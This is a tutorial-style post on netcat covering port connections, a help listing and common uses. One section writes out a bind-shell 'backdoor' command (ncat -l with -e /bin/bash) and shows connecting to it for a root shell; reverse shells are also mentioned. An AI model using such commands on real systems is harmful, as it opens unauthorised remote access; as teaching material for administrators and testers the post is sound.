nc netcat opening listening ports – Netcat scan examples. Netcat (often abbreviated as nc) is a versatile command-line utility used for managing network connections. Known as the “Swiss army knife” of networking tools, Netcat allows users to read from and write to network connections using TCP or UDP protocols. It’s often used by system administrators, network engineers, and security professionals for various tasks. Including debugging, port scanning, file transfers, and creating backdoors for network testing.

Netcat opening listening ports

Establish a connection to a remote port if open:

[~]# nc -vn 192.168.2.101 22
Ncat: Connected to 192.168.2.101:22.
SSH-2.0-OpenSSH\_7.6

As you see, netcat was able to reach 22 port and establish the connection successfully.

With netcat opening listening ports, UDP port connections are allowed.

[~]# ncat -v -u 1.1.1.1 53
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Connected to 1.1.1.1:53.

Netcat also has the ability to open a remote backdoor on the target system for 5000ms, see below:

[~]# ncat -l 54321 -e /bin/bash -v -w 5000ms
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 18E1 2645 4F8C 9E87 EAD3 DBC5 0901 B9B9 393D 0E77
Ncat: Listening on :::54321
Ncat: Listening on 0.0.0.0:54321

This will open the backdoor on port 54321 on the local system, then we will have to open a connection to gain system access:

[~]# ncat 127.0.0.1 54321 -v
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:54321.
ls
anaconda-ks.cfg
el\_dlurls.txt
file
pwd
/root
whoami
root
uname -r
4.xx.xx.fc28.x86\_64
^C
[root@localhost ~]#

Take a look at nc –help option if you want to learn more examples about how to use netcat.

usage: nc [-46AacCDdEFhklMnOortUuvz] [-K tc] [-b boundif] [-i interval] [-p source_port]
	  [--apple-recv-anyif] [--apple-awdl-unres]
	  [--apple-boundif ifbound]
	  [--apple-no-cellular] [--apple-no-expensive]
	  [--apple-no-flowadv] [--apple-tcp-timeout conntimo]
	  [--apple-tcp-keepalive keepidle] [--apple-tcp-keepintvl keepintvl]
	  [--apple-tcp-keepcnt keepcnt] [--apple-tclass tclass]
	  [--tcp-adp-rtimo num_probes] [--apple-initcoproc-allow]
	  [--apple-tcp-adp-wtimo num_probes]
	  [--setsockopt-later] [--apple-no-connectx]
	  [--apple-delegate-pid pid] [--apple-delegate-uuid uuid]
	  [--apple-kao] [--apple-ext-bk-idle]
	  [--apple-netsvctype svc] [---apple-nowakefromsleep]
	  [--apple-notify-ack] [--apple-sockev]
	  [--apple-tos tos] [--apple-tos-cmsg]
	  [-s source_ip_address] [-w timeout] [-X proxy_version]
	  [-x proxy_address[:port]] [hostname] [port[s]]

Key Features:

1. Port Scanning: Netcat can scan for open ports on a system by attempting to establish a connection to a range of IP addresses and ports. This helps identify available services or potential security vulnerabilities.
2. File Transfers: Netcat can transfer files between machines by creating a simple listener on one machine and sending data from the other. For example, using nc -l 1234 > file.txt on one system and nc IP_ADDRESS 1234 < file.txt on the other allows for easy file transfer.
3. Creating Reverse Shells: One of its powerful uses is in creating reverse shells, which can allow remote access to systems for testing or recovery purposes. This feature makes it popular in penetration testing.
4. Simple Chat Utility: By connecting two systems through specific ports, Netcat can also be used to create a basic chat interface between machines.

Netcat is highly regarded due to its simplicity and flexibility in network manipulation, but its capabilities should be used responsibly, as they can also be exploited for malicious activities. Being both lightweight and powerful, it remains a staple tool in the networking and cybersecurity toolbox.